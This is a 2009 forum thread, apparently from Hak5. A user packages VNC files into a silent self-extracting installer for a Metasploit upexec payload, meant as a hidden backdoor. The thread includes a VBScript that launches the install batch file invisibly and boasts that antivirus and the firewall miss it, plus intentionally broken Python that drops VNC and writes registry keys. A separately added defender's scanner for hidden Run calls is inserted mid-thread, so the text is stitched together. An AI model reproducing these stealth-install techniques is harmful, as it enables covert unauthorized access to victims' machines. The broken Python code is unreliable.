Deathray, posted April 6, 2009

Hi people. I would be so grateful for help with my situation. I have 4 files:

install.bat
VNCHOOKS.DLL
WINVNC.EXE
VNC.REG

Is there any way to combine these 4 files into a single, self-extracting .exe file which executes install.bat silently? The reason is that I am using the windows/upexec payload in Metasploit and want to install VNC as a service silently when executed, for future backdoor use.

gEEEk, posted April 6, 2009

I think a WinRAR SFX archive might be what you're looking for. It will compress and make all your files to a single executable which can run a file after the extraction.

Deathray, posted April 6, 2009

> I think a WinRAR SFX archive might be what you're looking for. It will compress and make all your files to a single executable which can run a file after the extraction.

Oh .. my... god! EXACTLY what I was looking for... 1 last problem - when the batch file gets executed the cmd.exe window pops up - any way to hide that? Thanks in advance!! :):)

Deathray, posted April 6, 2009

Never mind, I found a quick solution :) Instead of 4 files I have 5 files. A new one called install.vbs. It contains this:

    Set WshShell = CreateObject("WScript.Shell")
    cmds=WshShell.RUN(".\install.bat", 0, True)
    Set WshShell = Nothing

Now the batch file is completely invisible haha this is so cool :D Thank you soooo much for your help :)
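
For defenders, the hidden launch in the post above leaves a static signature: the second argument of WScript.Shell's Run method (intWindowStyle) is 0. The following is an added example, not code from the thread, that scans VBScript text for such calls; the function names and the second sample are constructed for illustration.

```python
import re

# <obj>.Run(<command>, <intWindowStyle>[, <bWaitOnReturn>]); parentheses optional.
RUN_CALL = re.compile(
    r'\.Run\s*\(?\s*(?P<cmd>"(?:[^"]|"")*"|[^,\r\n]+?)\s*,\s*(?P<style>[^,)\r\n]+)',
    re.IGNORECASE,
)
# "Const NAME = 0" or "NAME = 0": a name that stands in for window style 0.
ZERO_ASSIGN = re.compile(
    r"^\s*(?:const\s+)?(?P<name>[A-Za-z_]\w*)\s*=\s*0\s*$", re.IGNORECASE
)


def strip_comment(line):
    """Remove a VBScript comment (' or Rem); quotes inside strings are kept."""
    if re.match(r"\s*rem\b", line, re.IGNORECASE):
        return ""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line


def find_hidden_runs(script_text):
    """Return (line_number, command) for every Run call with window style 0."""
    lines = [strip_comment(raw) for raw in script_text.splitlines()]
    # Flow-insensitive: any name ever assigned a literal 0 counts as hidden.
    zero_names = {m.group("name").lower() for m in map(ZERO_ASSIGN.match, lines) if m}
    hidden = {"0"} | zero_names
    hits = []
    for number, line in enumerate(lines, start=1):
        for m in RUN_CALL.finditer(line):
            if m.group("style").strip().lower() in hidden:
                cmd = m.group("cmd").strip()
                if cmd.startswith('"'):  # unquote and undouble "" escapes
                    cmd = cmd[1:-1].replace('""', '"')
                hits.append((number, cmd))
    return hits


# The three lines posted in the thread, then a constructed sample.
THREAD_SNIPPET = r'''Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN(".\install.bat", 0, True)
Set WshShell = Nothing'''
CONSTRUCTED = r'''Const HIDDEN = 0
Set sh = CreateObject("WScript.Shell")
' sh.Run "cmd /c dir", 0
sh.Run "notepad.exe", 1, False
sh.Run "cmd /c ""C:\Tools\job.bat""", HIDDEN, True'''

if __name__ == "__main__":
    print(find_hidden_runs(THREAD_SNIPPET), find_hidden_runs(CONSTRUCTED))
```

A hit is a triage signal, not a verdict: legitimate logon and maintenance scripts also hide their console windows, so weigh the command being launched and where the script came from.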

freeb, posted April 6, 2009

I'm sure Darren did a segment about something like this in a previous season.

Deathray, posted April 6, 2009

> I'm sure Darren did a segment about something like this in a previous season.

A link would be great, there are so many videos :P

Deathray, posted April 6, 2009

> Start -> Run -> iexpress.exe

Been there, done that. iexpress.exe has some limits in the way it works. Not going to explain why but basically it sucks :P

Zimmer, posted April 7, 2009

ya Darren did a segment

Darren builds a one-click remote assistance package to help save the holidays

link to episode page: http://www.hak5.org/episodes/episode-3x05-release
mp4 file: http://www.podtrac.com/pts/redirect.mp4?ht...-3x05--ipod.mp4

Enjoy!

DingleBerries, posted April 7, 2009

Nice try USBHACKER! lol no but you can do all of that in less than 20 lines of python and still hide the cmd window. You have too many files running, it's just too sloppy.

Deathray, posted April 7, 2009

> Nice try USBHACKER! lol no but you can do all of that in less than 20 lines of python and still hide the cmd window. You have too many files running, it's just too sloppy.

lol yeah I did steal the batch + vnc from gonzors payload :D ... But I thought it was great because it installs itself as a service and no antivirus detects it as a virus, plus windows firewall doesn't seem to care about VNC binding to a port :)

Yeah probably - but that would require me learning python first AND the victim would have to have python installed on his computer, which is not realistic and I want my lab to be realistic :).

Thanks Zimmer for the link. Hope you didn't use any more time than I would have if I looked for it by myself.

DingleBerries, posted April 7, 2009

> Yeah probably - but that would require me learning python first AND the victim would have to have python installed on his computer,

Nope, just turn the python code into an executable and it will run under almost any windows system.

Deathray, posted April 8, 2009

> Nope, just turn the python code into an executable and it will run under almost any windows system.

Wouldn't that be more sloppy as it would require the executable file to contain the entire python runtime?

DingleBerries, posted April 8, 2009

> Wouldn't that be more sloppy as it would require the executable file to contain the entire python runtime?

Nope, as a matter of fact I am making an exe to do all this atm. I will post the link to it later.

Source:

VNC.exe

    import os,
    from ConfigParser import ConfigParser
    config.read('vnc.cfg')
    newpath = config.get('Move To', 'Location')
    vncauth = config.get('VNC Auth', 'Password')
    if not os.path.isdir(newpath):
    srcname = "winvnc.exe"
    srcname = "hooks.dll"
    shutil.copy(srcname, newpath)
    shutil.copy(srcname1, newpath)
    f = open("VNC.reg", 'r')
    f.write('Windows Registry Editor Version 5.00\n[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC][HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4]\n')
    f.write(vncauth)
    f.write('REG SHIT')
    f.close()
    reg=os.popen3('VNC.reg','b')
    runvnc=os.popen3(newpath + 'winvnc4.exe','b')

VNC.cfg

    [Move To]
    Location: C:\VNC
    [VNC Auth]
    Password: “Password”=hex:HEX COMMA SEPARATED PASS

Ask for permission to edit the registry but you get the idea. Less than 1MB and you can do pretty much what you want with it. Code is sloppy, missing shit and doesn't work on purpose.